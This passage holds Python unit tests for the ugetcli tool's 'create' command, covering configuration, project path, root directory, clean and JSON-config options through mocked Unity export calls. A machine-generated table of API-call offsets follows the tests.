unitypackage_runner_instance.export_unitypackage = export_unitypackage_mock
unitypackage_runner_mock.return_value = unitypackage_runner_instance
csproj_instance = MagicMock()
csproj_instance.get_assembly_name.return_value = "TestProject"
csproj_instance.get_assembly_version.return_value = "1.0.0"
csproj_instance.get_output_path.return_value = "bin/Output/Debug"
csproj_instance.path = "TestProject.csproj"
csproj_mock.return_value = csproj_instance
runner = CliRunner(env={})
with runner.isolated_filesystem():
os.makedirs("bin/Output/Debug")
create_empty_file("bin/Output/Debug/TestProject.dll")
create_empty_file("bin/Output/Debug/TestProject.pdb")
result = runner.invoke(cli.ugetcli, ['create', '--configuration', 'Debug'],
obj={})
assert result.exit_code == 0, result
unitypackage_runner_mock.assert_called_with(False)
assert invocation_results[0], "did not invoke export_unitypackage_mock"
@patch('ugetcli.uget.CsProj')
@patch('ugetcli.uget.UnityPackageRunner')
def test_cli_uget_create_with_unity_project_path(
self, unitypackage_runner_mock, csproj_mock):
"""Test cli: uget create with --unity-project-path"""
invocation_results = [False]
# Mock running Unity to export unity package
def export_unitypackage_mock(*args, **kwargs):
assert 'MyUnityProject' in args[0] # In temp folder
assert os.path.normpath('UnityProject/Assets/TestProject') in args[0]
assert os.path.normpath('Output/TestProject_1.0.0_Release.unitypackage') in args[1]
create_empty_file(args[1])
invocation_results[0] = True
return 0
unitypackage_runner_instance = MagicMock()
unitypackage_runner_instance.export_unitypackage = export_unitypackage_mock
unitypackage_runner_mock.return_value = unitypackage_runner_instance
csproj_instance = MagicMock()
csproj_instance.get_assembly_name.return_value = "TestProject"
csproj_instance.get_assembly_version.return_value = "1.0.0"
csproj_instance.get_output_path.return_value = "bin/Output/Debug"
csproj_instance.path = "TestProject.csproj"
csproj_mock.return_value = csproj_instance
runner = CliRunner(env={})
with runner.isolated_filesystem():
os.makedirs("bin/Output/Debug")
create_empty_file("bin/Output/Debug/TestProject.dll")
create_empty_file("bin/Output/Debug/TestProject.pdb")
result = runner.invoke(
cli.ugetcli, ['create', '--unity-project-path', 'MyUnityProject'], obj={})
assert result.exit_code == 0, result
unitypackage_runner_mock.assert_called_with(False)
assert invocation_results[0], "did not invoke export_unitypackage_mock"
@patch('ugetcli.uget.CsProj')
@patch('ugetcli.uget.UnityPackageRunner')
def test_cli_uget_create_with_root_directory(
self, unitypackage_runner_mock, csproj_mock):
"""Test cli: uget create with --root-dir"""
invocation_results = [False]
# Mock running Unity to export unity package
def export_unitypackage_mock(*args, **kwargs):
assert 'UnityProject' in args[0] # In temp folder
assert os.path.normpath('UnityProject/Assets/MyUnityPackageRoot') in args[0]
assert os.path.normpath('Output/TestProject_1.0.0_Release.unitypackage') in args[1]
create_empty_file(args[1])
invocation_results[0] = True
return 0
unitypackage_runner_instance = MagicMock()
unitypackage_runner_instance.export_unitypackage = export_unitypackage_mock
unitypackage_runner_mock.return_value = unitypackage_runner_instance
csproj_instance = MagicMock()
csproj_instance.get_assembly_name.return_value = "TestProject"
csproj_instance.get_assembly_version.return_value = "1.0.0"
csproj_instance.get_output_path.return_value = "bin/Output/Debug"
csproj_instance.path = "TestProject.csproj"
csproj_mock.return_value = csproj_instance
runner = CliRunner(env={})
with runner.isolated_filesystem():
os.makedirs("bin/Output/Debug")
create_empty_file("bin/Output/Debug/TestProject.dll")
create_empty_file("bin/Output/Debug/TestProject.pdb")
result = runner.invoke(
cli.ugetcli, ['create', '--root-dir', 'MyUnityPackageRoot'], obj={})
assert result.exit_code == 0, result
unitypackage_runner_mock.assert_called_with(False)
assert invocation_results[0], "did not invoke export_unitypackage_mock"
@patch('ugetcli.uget.CsProj')
@patch('ugetcli.uget.UnityPackageRunner')
def test_cli_uget_create_with_clean(
self, unitypackage_runner_mock, csproj_mock):
"""Test cli: uget create with --clean"""
invocation_results = [False]
# Mock running Unity to export unity package
def export_unitypackage_mock(*args, **kwargs):
assert 'UnityProject' in args[0] # In temp folder
assert os.path.normpath('UnityProject/Assets/TestProject') in args[0]
assert os.path.normpath('Output/TestProject_1.0.0_Release.unitypackage') in args[1]
create_empty_file(args[1])
invocation_results[0] = True
return 0
unitypackage_runner_instance = MagicMock()
unitypackage_runner_instance.export_unitypackage = export_unitypackage_mock
unitypackage_runner_mock.return_value = unitypackage_runner_instance
csproj_instance = MagicMock()
csproj_instance.get_assembly_name.return_value = "TestProject"
csproj_instance.get_assembly_version.return_value = "1.0.0"
csproj_instance.get_output_path.return_value = "bin/Output/Debug"
csproj_instance.path = "TestProject.csproj"
csproj_mock.return_value = csproj_instance
runner = CliRunner(env={})
with runner.isolated_filesystem():
os.makedirs("bin/Output/Debug")
create_empty_file("bin/Output/Debug/TestProject.dll")
create_empty_file("bin/Output/Debug/TestProject.pdb")
os.makedirs("Output/")
create_empty_file("Output/TestProject_0.1.0_Release.unitypackage") # Should be removed
create_empty_file("Output/TestProject_0.1.1_Release.unitypackage") # Should be removed
create_empty_file("Output/TestProject_0.1.0_Debug.unitypackage") # Should NOT be removed
result = runner.invoke(
cli.ugetcli, ['create', '--clean'], obj={})
assert not os.path.isfile("Output/TestProject_0.1.0_Release.unitypackage")
assert not os.path.isfile("Output/TestProject_0.1.1_Release.unitypackage")
assert os.path.isfile("Output/TestProject_0.1.0_Debug.unitypackage")
assert result.exit_code == 0, result
unitypackage_runner_mock.assert_called_with(False)
assert invocation_results[0], "did not invoke export_unitypackage_mock"
@patch('ugetcli.uget.CsProj')
@patch('ugetcli.uget.UnityPackageRunner')
def test_cli_uget_create_with_unity_username(
self, unitypackage_runner_mock, csproj_mock):
"""Test cli: uget create with --unity-username"""
invocation_results = [False]
# Mock running Unity to export unity package
def export_unitypackage_mock(*args, **kwargs):
assert 'UnityProject' in args[0] # In temp folder
assert os.path.normpath('UnityProject/Assets/TestProject') in args[0]
assert os.path.normpath('Output/TestProject_1.0.0_Release.unitypackage') in args[1]
create_empty_file(args[1])
invocation_results[0] = True
return 0
unitypackage_runner_instance = MagicMock()
unitypackage_runner_instance.export_unitypackage = export_unitypackage_mock
unitypackage_runner_mock.return_value = unitypackage_runner_instance
csproj_instance = MagicMock()
csproj_instance.get_assembly_name.return_value = "TestProject"
csproj_instance.get_assembly_version.return_value = "1.0.0"
csproj_instance.get_output_path.return_value = "bin/Output/Debug"
csproj_instance.path = "TestProject.csproj"
csproj_mock.return_value = csproj_instance
runner = CliRunner(env={})
with runner.isolated_filesystem():
os.makedirs("bin/Output/Debug")
create_empty_file("bin/Output/Debug/TestProject.dll")
create_empty_file("bin/Output/Debug/TestProject.pdb")
result = runner.invoke(
cli.ugetcli, ['create'], obj={})
assert result.exit_code == 0, result
unitypackage_runner_mock.assert_called_with(False)
assert invocation_results[0], "did not invoke export_unitypackage_mock"
@patch('ugetcli.uget.CsProj')
@patch('ugetcli.uget.UnityPackageRunner')
def test_cli_uget_create_with_config_json(
self, unitypackage_runner_mock, csproj_mock):
"""Test cli: uget create with options loaded via config json"""
invocation_results = [False]
# Mock running Unity to export unity package
def export_unitypackage_mock(*args, **kwargs):
assert 'CustomUnityProject' in args[0] # In temp folder
assert os.path.normpath('CustomUnityProject/Assets/MyUnityPackage') in args[0]
assert os.path.normpath('CustomOutput/TestProject_1.0.0_Debug.unitypackage') in args[1]
create_empty_file(args[1])
invocation_results[0] = True
return 0
unitypackage_runner_instance = MagicMock()
unitypackage_runner_instance.export_unitypackage = export_unitypackage_mock
unitypackage_runner_mock.return_value = unitypackage_runner_instance
csproj_instance = MagicMock()
csproj_instance.get_assembly_name.return_value = "TestProject"
csproj_instance.get_assembly_version.return_value = "1.0.0"
csproj_instance.get_output_path.return_value = "bin/Output/Debug"
csproj_instance.path = "TestProject.csproj"
csproj_mock.return_value = csproj_instance
config_data = {
"output_dir": "CustomOutput",
"configuration": "Debug",
"unity_project_path": "CustomUnityProject",
"root_dir": "MyUnityPackage",
"clean": True,
}
runner = CliRunner(env={})
with runner.isolated_filesystem():
os.makedirs("bin/Output/Debug")
create_empty_file("bin/Output/Debug/TestProject.dll")
create_empty_file("bin/Output/Debug/TestProject.pdb")
os.makedirs("CustomOutput/")
create_empty_file("CustomOutput/TestProject_0.1.0_Release.unitypackage") # Should be removed
result = runner.invoke(
cli.ugetcli, ['create', '--config', json.dumps(config_data)], obj={})
assert not os.path.isfile("Output/TestProject_0.1.0_Release.unitypackage")
assert result.exit_code == 0, result
unitypackage_runner_mock.assert_called_with(False)
assert invocation_results[0], "did not invoke export_unitypackage_mock"
| [
"mock.patch",
"os.makedirs",
"json.dumps",
"click.testing.CliRunner",
"os.path.isfile",
"os.path.normpath",
"ugetcli.utils.create_empty_file",
"mock.MagicMock"
] | [((481, 509), 'mock.patch', 'patch', (['"""ugetcli.uget.CsProj"""'], {}), "('ugetcli.uget.CsProj')\n", (486, 509), False, 'from mock import MagicMock, patch\n'), ((515, 555), 'mock.patch', 'patch', (['"""ugetcli.uget.UnityPackageRunner"""'], {}), "('ugetcli.uget.UnityPackageRunner')\n", (520, 555), False, 'from mock import MagicMock, patch\n'), ((2343, 2371), 'mock.patch', 'patch', (['"""ugetcli.uget.CsProj"""'], {}), "('ugetcli.uget.CsProj')\n", (2348, 2371), False, 'from mock import MagicMock, patch\n'), ((2377, 2417), 'mock.patch', 'patch', (['"""ugetcli.uget.UnityPackageRunner"""'], {}), "('ugetcli.uget.UnityPackageRunner')\n", (2382, 2417), False, 'from mock import MagicMock, patch\n'), ((4270, 4298), 'mock.patch', 'patch', (['"""ugetcli.uget.CsProj"""'], {}), "('ugetcli.uget.CsProj')\n", (4275, 4298), False, 'from mock import MagicMock, patch\n'), ((4304, 4344), 'mock.patch', 'patch', (['"""ugetcli.uget.UnityPackageRunner"""'], {}), "('ugetcli.uget.UnityPackageRunner')\n", (4309, 4344), False, 'from mock import MagicMock, patch\n'), ((6227, 6255), 'mock.patch', 'patch', (['"""ugetcli.uget.CsProj"""'], {}), "('ugetcli.uget.CsProj')\n", (6232, 6255), False, 'from mock import MagicMock, patch\n'), ((6261, 6301), 'mock.patch', 'patch', (['"""ugetcli.uget.UnityPackageRunner"""'], {}), "('ugetcli.uget.UnityPackageRunner')\n", (6266, 6301), False, 'from mock import MagicMock, patch\n'), ((8054, 8082), 'mock.patch', 'patch', (['"""ugetcli.uget.CsProj"""'], {}), "('ugetcli.uget.CsProj')\n", (8059, 8082), False, 'from mock import MagicMock, patch\n'), ((8088, 8128), 'mock.patch', 'patch', (['"""ugetcli.uget.UnityPackageRunner"""'], {}), "('ugetcli.uget.UnityPackageRunner')\n", (8093, 8128), False, 'from mock import MagicMock, patch\n'), ((9928, 9956), 'mock.patch', 'patch', (['"""ugetcli.uget.CsProj"""'], {}), "('ugetcli.uget.CsProj')\n", (9933, 9956), False, 'from mock import MagicMock, patch\n'), ((9962, 10002), 'mock.patch', 'patch', (['"""ugetcli.uget.UnityPackageRunner"""'], {}), "('ugetcli.uget.UnityPackageRunner')\n", (9967, 10002), False, 'from mock import MagicMock, patch\n'), ((11805, 11833), 'mock.patch', 'patch', (['"""ugetcli.uget.CsProj"""'], {}), "('ugetcli.uget.CsProj')\n", (11810, 11833), False, 'from mock import MagicMock, patch\n'), ((11839, 11879), 'mock.patch', 'patch', (['"""ugetcli.uget.UnityPackageRunner"""'], {}), "('ugetcli.uget.UnityPackageRunner')\n", (11844, 11879), False, 'from mock import MagicMock, patch\n'), ((13667, 13695), 'mock.patch', 'patch', (['"""ugetcli.uget.CsProj"""'], {}), "('ugetcli.uget.CsProj')\n", (13672, 13695), False, 'from mock import MagicMock, patch\n'), ((13701, 13741), 'mock.patch', 'patch', (['"""ugetcli.uget.UnityPackageRunner"""'], {}), "('ugetcli.uget.UnityPackageRunner')\n", (13706, 13741), False, 'from mock import MagicMock, patch\n'), ((16078, 16106), 'mock.patch', 'patch', (['"""ugetcli.uget.CsProj"""'], {}), "('ugetcli.uget.CsProj')\n", (16083, 16106), False, 'from mock import MagicMock, patch\n'), ((16112, 16152), 'mock.patch', 'patch', (['"""ugetcli.uget.UnityPackageRunner"""'], {}), "('ugetcli.uget.UnityPackageRunner')\n", (16117, 16152), False, 'from mock import MagicMock, patch\n'), ((17903, 17931), 'mock.patch', 'patch', (['"""ugetcli.uget.CsProj"""'], {}), "('ugetcli.uget.CsProj')\n", (17908, 17931), False, 'from mock import MagicMock, patch\n'), ((17937, 17977), 'mock.patch', 'patch', (['"""ugetcli.uget.UnityPackageRunner"""'], {}), "('ugetcli.uget.UnityPackageRunner')\n", (17942, 17977), False, 'from mock import MagicMock, patch\n'), ((1226, 1237), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (1235, 1237), False, 'from mock import MagicMock, patch\n'), ((1426, 1437), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (1435, 1437), False, 'from mock import MagicMock, patch\n'), ((1847, 1864), 'click.testing.CliRunner', 'CliRunner', ([], {'env': '{}'}), '(env={})\n', (1856, 1864), False, 'from click.testing import CliRunner\n'), ((3131, 3142), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (3140, 3142), False, 'from mock import MagicMock, patch\n'), ((3331, 3342), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (3340, 3342), False, 'from mock import MagicMock, patch\n'), ((3682, 3699), 'click.testing.CliRunner', 'CliRunner', ([], {'env': '{}'}), '(env={})\n', (3691, 3699), False, 'from click.testing import CliRunner\n'), ((5056, 5067), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (5065, 5067), False, 'from mock import MagicMock, patch\n'), ((5256, 5267), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (5265, 5267), False, 'from mock import MagicMock, patch\n'), ((5607, 5624), 'click.testing.CliRunner', 'CliRunner', ([], {'env': '{}'}), '(env={})\n', (5616, 5624), False, 'from click.testing import CliRunner\n'), ((6989, 7000), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (6998, 7000), False, 'from mock import MagicMock, patch\n'), ((7189, 7200), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (7198, 7200), False, 'from mock import MagicMock, patch\n'), ((7535, 7552), 'click.testing.CliRunner', 'CliRunner', ([], {'env': '{}'}), '(env={})\n', (7544, 7552), False, 'from click.testing import CliRunner\n'), ((8823, 8834), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (8832, 8834), False, 'from mock import MagicMock, patch\n'), ((9023, 9034), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (9032, 9034), False, 'from mock import MagicMock, patch\n'), ((9369, 9386), 'click.testing.CliRunner', 'CliRunner', ([], {'env': '{}'}), '(env={})\n', (9378, 9386), False, 'from click.testing import CliRunner\n'), ((10704, 10715), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (10713, 10715), False, 'from mock import MagicMock, patch\n'), ((10904, 10915), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (10913, 10915), False, 'from mock import MagicMock, patch\n'), ((11250, 11267), 'click.testing.CliRunner', 'CliRunner', ([], {'env': '{}'}), '(env={})\n', (11259, 11267), False, 'from click.testing import CliRunner\n'), ((12572, 12583), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (12581, 12583), False, 'from mock import MagicMock, patch\n'), ((12772, 12783), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (12781, 12783), False, 'from mock import MagicMock, patch\n'), ((13118, 13135), 'click.testing.CliRunner', 'CliRunner', ([], {'env': '{}'}), '(env={})\n', (13127, 13135), False, 'from click.testing import CliRunner\n'), ((14415, 14426), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (14424, 14426), False, 'from mock import MagicMock, patch\n'), ((14615, 14626), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (14624, 14626), False, 'from mock import MagicMock, patch\n'), ((14961, 14978), 'click.testing.CliRunner', 'CliRunner', ([], {'env': '{}'}), '(env={})\n', (14970, 14978), False, 'from click.testing import CliRunner\n'), ((16844, 16855), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (16853, 16855), False, 'from mock import MagicMock, patch\n'), ((17044, 17055), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (17053, 17055), False, 'from mock import MagicMock, patch\n'), ((17390, 17407), 'click.testing.CliRunner', 'CliRunner', ([], {'env': '{}'}), '(env={})\n', (17399, 17407), False, 'from click.testing import CliRunner\n'), ((18699, 18710), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (18708, 18710), False, 'from mock import MagicMock, patch\n'), ((18899, 18910), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (18908, 18910), False, 'from mock import MagicMock, patch\n'), ((19485, 19502), 'click.testing.CliRunner', 'CliRunner', ([], {'env': '{}'}), '(env={})\n', (19494, 19502), False, 'from click.testing import CliRunner\n'), ((1097, 1123), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['args[1]'], {}), '(args[1])\n', (1114, 1123), False, 'from ugetcli.utils import create_empty_file\n'), ((1920, 1951), 'os.makedirs', 'os.makedirs', (['"""bin/Output/Debug"""'], {}), "('bin/Output/Debug')\n", (1931, 1951), False, 'import os\n'), ((1964, 2017), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""bin/Output/Debug/TestProject.dll"""'], {}), "('bin/Output/Debug/TestProject.dll')\n", (1981, 2017), False, 'from ugetcli.utils import create_empty_file\n'), ((2030, 2083), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""bin/Output/Debug/TestProject.pdb"""'], {}), "('bin/Output/Debug/TestProject.pdb')\n", (2047, 2083), False, 'from ugetcli.utils import create_empty_file\n'), ((3002, 3028), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['args[1]'], {}), '(args[1])\n', (3019, 3028), False, 'from ugetcli.utils import create_empty_file\n'), ((3755, 3793), 'os.makedirs', 'os.makedirs', (['"""custom/bin/Output/Debug"""'], {}), "('custom/bin/Output/Debug')\n", (3766, 3793), False, 'import os\n'), ((3806, 3866), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""custom/bin/Output/Debug/TestProject.dll"""'], {}), "('custom/bin/Output/Debug/TestProject.dll')\n", (3823, 3866), False, 'from ugetcli.utils import create_empty_file\n'), ((3879, 3939), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""custom/bin/Output/Debug/TestProject.pdb"""'], {}), "('custom/bin/Output/Debug/TestProject.pdb')\n", (3896, 3939), False, 'from ugetcli.utils import create_empty_file\n'), ((4927, 4953), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['args[1]'], {}), '(args[1])\n', (4944, 4953), False, 'from ugetcli.utils import create_empty_file\n'), ((5680, 5718), 'os.makedirs', 'os.makedirs', (['"""custom/bin/Output/Debug"""'], {}), "('custom/bin/Output/Debug')\n", (5691, 5718), False, 'import os\n'), ((5731, 5791), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""custom/bin/Output/Debug/TestProject.dll"""'], {}), "('custom/bin/Output/Debug/TestProject.dll')\n", (5748, 5791), False, 'from ugetcli.utils import create_empty_file\n'), ((5804, 5864), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""custom/bin/Output/Debug/TestProject.pdb"""'], {}), "('custom/bin/Output/Debug/TestProject.pdb')\n", (5821, 5864), False, 'from ugetcli.utils import create_empty_file\n'), ((6860, 6886), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['args[1]'], {}), '(args[1])\n', (6877, 6886), False, 'from ugetcli.utils import create_empty_file\n'), ((7608, 7639), 'os.makedirs', 'os.makedirs', (['"""bin/Output/Debug"""'], {}), "('bin/Output/Debug')\n", (7619, 7639), False, 'import os\n'), ((7652, 7705), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""bin/Output/Debug/TestProject.dll"""'], {}), "('bin/Output/Debug/TestProject.dll')\n", (7669, 7705), False, 'from ugetcli.utils import create_empty_file\n'), ((7718, 7771), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""bin/Output/Debug/TestProject.pdb"""'], {}), "('bin/Output/Debug/TestProject.pdb')\n", (7735, 7771), False, 'from ugetcli.utils import create_empty_file\n'), ((8694, 8720), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['args[1]'], {}), '(args[1])\n', (8711, 8720), False, 'from ugetcli.utils import create_empty_file\n'), ((9442, 9473), 'os.makedirs', 'os.makedirs', (['"""bin/Output/Debug"""'], {}), "('bin/Output/Debug')\n", (9453, 9473), False, 'import os\n'), ((9486, 9539), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""bin/Output/Debug/TestProject.dll"""'], {}), "('bin/Output/Debug/TestProject.dll')\n", (9503, 9539), False, 'from ugetcli.utils import create_empty_file\n'), ((9552, 9605), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""bin/Output/Debug/TestProject.pdb"""'], {}), "('bin/Output/Debug/TestProject.pdb')\n", (9569, 9605), False, 'from ugetcli.utils import create_empty_file\n'), ((10575, 10601), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['args[1]'], {}), '(args[1])\n', (10592, 10601), False, 'from ugetcli.utils import create_empty_file\n'), ((11323, 11354), 'os.makedirs', 'os.makedirs', (['"""bin/Output/Debug"""'], {}), "('bin/Output/Debug')\n", (11334, 11354), False, 'import os\n'), ((11367, 11420), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""bin/Output/Debug/TestProject.dll"""'], {}), "('bin/Output/Debug/TestProject.dll')\n", (11384, 11420), False, 'from ugetcli.utils import create_empty_file\n'), ((11433, 11486), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""bin/Output/Debug/TestProject.pdb"""'], {}), "('bin/Output/Debug/TestProject.pdb')\n", (11450, 11486), False, 'from ugetcli.utils import create_empty_file\n'), ((12443, 12469), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['args[1]'], {}), '(args[1])\n', (12460, 12469), False, 'from ugetcli.utils import create_empty_file\n'), ((13191, 13222), 'os.makedirs', 'os.makedirs', (['"""bin/Output/Debug"""'], {}), "('bin/Output/Debug')\n", (13202, 13222), False, 'import os\n'), ((13235, 13288), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""bin/Output/Debug/TestProject.dll"""'], {}), "('bin/Output/Debug/TestProject.dll')\n", (13252, 13288), False, 'from ugetcli.utils import create_empty_file\n'), ((13301, 13354), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""bin/Output/Debug/TestProject.pdb"""'], {}), "('bin/Output/Debug/TestProject.pdb')\n", (13318, 13354), False, 'from ugetcli.utils import create_empty_file\n'), ((14286, 14312), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['args[1]'], {}), '(args[1])\n', (14303, 14312), False, 'from ugetcli.utils import create_empty_file\n'), ((15034, 15065), 'os.makedirs', 'os.makedirs', (['"""bin/Output/Debug"""'], {}), "('bin/Output/Debug')\n", (15045, 15065), False, 'import os\n'), ((15078, 15131), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""bin/Output/Debug/TestProject.dll"""'], {}), "('bin/Output/Debug/TestProject.dll')\n", (15095, 15131), False, 'from ugetcli.utils import create_empty_file\n'), ((15144, 15197), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""bin/Output/Debug/TestProject.pdb"""'], {}), "('bin/Output/Debug/TestProject.pdb')\n", (15161, 15197), False, 'from ugetcli.utils import create_empty_file\n'), ((15210, 15232), 'os.makedirs', 'os.makedirs', (['"""Output/"""'], {}), "('Output/')\n", (15221, 15232), False, 'import os\n'), ((15245, 15311), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""Output/TestProject_0.1.0_Release.unitypackage"""'], {}), "('Output/TestProject_0.1.0_Release.unitypackage')\n", (15262, 15311), False, 'from ugetcli.utils import create_empty_file\n'), ((15345, 15411), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""Output/TestProject_0.1.1_Release.unitypackage"""'], {}), "('Output/TestProject_0.1.1_Release.unitypackage')\n", (15362, 15411), False, 'from ugetcli.utils import create_empty_file\n'), ((15445, 15509), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""Output/TestProject_0.1.0_Debug.unitypackage"""'], {}), "('Output/TestProject_0.1.0_Debug.unitypackage')\n", (15462, 15509), False, 'from ugetcli.utils import create_empty_file\n'), ((15825, 15886), 'os.path.isfile', 'os.path.isfile', (['"""Output/TestProject_0.1.0_Debug.unitypackage"""'], {}), "('Output/TestProject_0.1.0_Debug.unitypackage')\n", (15839, 15886), False, 'import os\n'), ((16715, 16741), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['args[1]'], {}), '(args[1])\n', (16732, 16741), False, 'from ugetcli.utils import create_empty_file\n'), ((17463, 17494), 'os.makedirs', 'os.makedirs', (['"""bin/Output/Debug"""'], {}), "('bin/Output/Debug')\n", (17474, 17494), False, 'import os\n'), ((17507, 17560), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""bin/Output/Debug/TestProject.dll"""'], {}), "('bin/Output/Debug/TestProject.dll')\n", (17524, 17560), False, 'from ugetcli.utils import create_empty_file\n'), ((17573, 17626), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""bin/Output/Debug/TestProject.pdb"""'], {}), "('bin/Output/Debug/TestProject.pdb')\n", (17590, 17626), False, 'from ugetcli.utils import create_empty_file\n'), ((18570, 18596), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['args[1]'], {}), '(args[1])\n', (18587, 18596), False, 'from ugetcli.utils import create_empty_file\n'), ((19558, 19589), 'os.makedirs', 'os.makedirs', (['"""bin/Output/Debug"""'], {}), "('bin/Output/Debug')\n", (19569, 19589), False, 'import os\n'), ((19602, 19655), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""bin/Output/Debug/TestProject.dll"""'], {}), "('bin/Output/Debug/TestProject.dll')\n", (19619, 19655), False, 'from ugetcli.utils import create_empty_file\n'), ((19668, 19721), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""bin/Output/Debug/TestProject.pdb"""'], {}), "('bin/Output/Debug/TestProject.pdb')\n", (19685, 19721), False, 'from ugetcli.utils import create_empty_file\n'), ((19734, 19762), 'os.makedirs', 'os.makedirs', (['"""CustomOutput/"""'], {}), "('CustomOutput/')\n", (19745, 19762), False, 'import os\n'), ((19775, 19847), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['"""CustomOutput/TestProject_0.1.0_Release.unitypackage"""'], {}), "('CustomOutput/TestProject_0.1.0_Release.unitypackage')\n", (19792, 19847), False, 'from ugetcli.utils import create_empty_file\n'), ((926, 977), 'os.path.normpath', 'os.path.normpath', (['"""UnityProject/Assets/TestProject"""'], {}), "('UnityProject/Assets/TestProject')\n", (942, 977), False, 'import os\n'), ((1008, 1073), 'os.path.normpath', 'os.path.normpath', (['"""Output/TestProject_1.0.0_Release.unitypackage"""'], {}), "('Output/TestProject_1.0.0_Release.unitypackage')\n", (1024, 1073), False, 'import os\n'), ((2831, 2882), 'os.path.normpath', 'os.path.normpath', (['"""UnityProject/Assets/TestProject"""'], {}), "('UnityProject/Assets/TestProject')\n", (2847, 2882), False, 'import os\n'), ((2913, 2978), 'os.path.normpath', 'os.path.normpath', (['"""Output/TestProject_1.0.0_Release.unitypackage"""'], {}), "('Output/TestProject_1.0.0_Release.unitypackage')\n", (2929, 2978), False, 'import os\n'), ((4756, 4807), 'os.path.normpath', 'os.path.normpath', (['"""UnityProject/Assets/TestProject"""'], {}), "('UnityProject/Assets/TestProject')\n", (4772, 4807), False, 'import os\n'), ((4838, 4903), 'os.path.normpath', 'os.path.normpath', (['"""Output/TestProject_1.0.0_Release.unitypackage"""'], {}), "('Output/TestProject_1.0.0_Release.unitypackage')\n", (4854, 4903), False, 'import os\n'), ((6692, 6743), 'os.path.normpath', 'os.path.normpath', (['"""UnityProject/Assets/TestProject"""'], {}), "('UnityProject/Assets/TestProject')\n", (6708, 6743), False, 'import os\n'), ((6774, 6836), 'os.path.normpath', 'os.path.normpath', (['"""out/TestProject_1.0.0_Release.unitypackage"""'], {}), "('out/TestProject_1.0.0_Release.unitypackage')\n", (6790, 6836), False, 'import os\n'), ((8525, 8576), 'os.path.normpath', 'os.path.normpath', (['"""UnityProject/Assets/TestProject"""'], {}), "('UnityProject/Assets/TestProject')\n", (8541, 8576), False, 'import os\n'), ((8607, 8670), 'os.path.normpath', 'os.path.normpath', (['"""Output/TestProject_1.0.0_Debug.unitypackage"""'], {}), "('Output/TestProject_1.0.0_Debug.unitypackage')\n", (8623, 8670), False, 'import os\n'), ((10404, 10455), 'os.path.normpath', 'os.path.normpath', (['"""UnityProject/Assets/TestProject"""'], {}), "('UnityProject/Assets/TestProject')\n", (10420, 10455), False, 'import os\n'), ((10486, 10551), 'os.path.normpath', 'os.path.normpath', (['"""Output/TestProject_1.0.0_Release.unitypackage"""'], {}), "('Output/TestProject_1.0.0_Release.unitypackage')\n", (10502, 10551), False, 'import os\n'), ((12265, 12323), 'os.path.normpath', 'os.path.normpath', (['"""UnityProject/Assets/MyUnityPackageRoot"""'], {}), "('UnityProject/Assets/MyUnityPackageRoot')\n", (12281, 12323), False, 'import os\n'), ((12354, 12419), 'os.path.normpath', 'os.path.normpath', (['"""Output/TestProject_1.0.0_Release.unitypackage"""'], {}), "('Output/TestProject_1.0.0_Release.unitypackage')\n", (12370, 12419), False, 'import os\n'), ((14115, 14166), 'os.path.normpath', 'os.path.normpath', (['"""UnityProject/Assets/TestProject"""'], {}), "('UnityProject/Assets/TestProject')\n", (14131, 14166), False, 'import os\n'), ((14197, 14262), 'os.path.normpath', 'os.path.normpath', (['"""Output/TestProject_1.0.0_Release.unitypackage"""'], {}), "('Output/TestProject_1.0.0_Release.unitypackage')\n", (14213, 14262), False, 'import os\n'), ((15655, 15718), 'os.path.isfile', 'os.path.isfile', (['"""Output/TestProject_0.1.0_Release.unitypackage"""'], {}), "('Output/TestProject_0.1.0_Release.unitypackage')\n", 